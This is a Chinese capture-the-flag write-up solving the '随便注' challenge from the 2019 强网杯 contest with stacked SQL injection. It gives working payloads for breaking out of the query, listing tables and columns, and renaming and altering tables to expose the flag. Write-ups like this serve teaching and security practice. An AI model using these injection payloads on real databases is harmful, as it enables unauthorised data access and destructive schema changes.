堆叠注入-[强网杯 2019]随便注

 

 输入1进去，发现可以正常输出；

在身上1';发现不能进行正常回显。

 

 

 试了一下 1' or 1=1 #发现有正常回显；

 

 

 再进行查询表；

1';show tables;

 

 

 发现有两个表，只有一个一个的试，没有十分明显的标志；
1';show columns from `1919810931114514`;#

 

 

 第一次试 1919810931114514这个表就发现了flag；

但在查这个数字表名试一定要加反引号``，在这个地方卡了好久。。；

继续查找flag；发现我无法直接查出flag的值；

又去查了一下words的内容

 

 没有找到有用信息；就搜了一下wp，发现还要改表名；只有去改表名；

1';rename table words to word1;rename table `1919810931114514` to words;
alter table words add id int unsigned not null auto_increment primary key;
alter table words change flag data varchar(100);#

将flag的列改为id，以便直接查询；

 

 还是回到了原来的样子；

再用1' or 1=1;# 进行查询；得到flag。

 

 

 总结：这个主要利用了sql的叠堆注入；过滤了太多的关键字，无法直接进行查询。

Stacked injections(堆叠注入)从名词的含义就可以看到应该是一堆 sql 语句(多条)一起执行。每一条语句的结束用;(分号)隔开；主要是要用到改表名；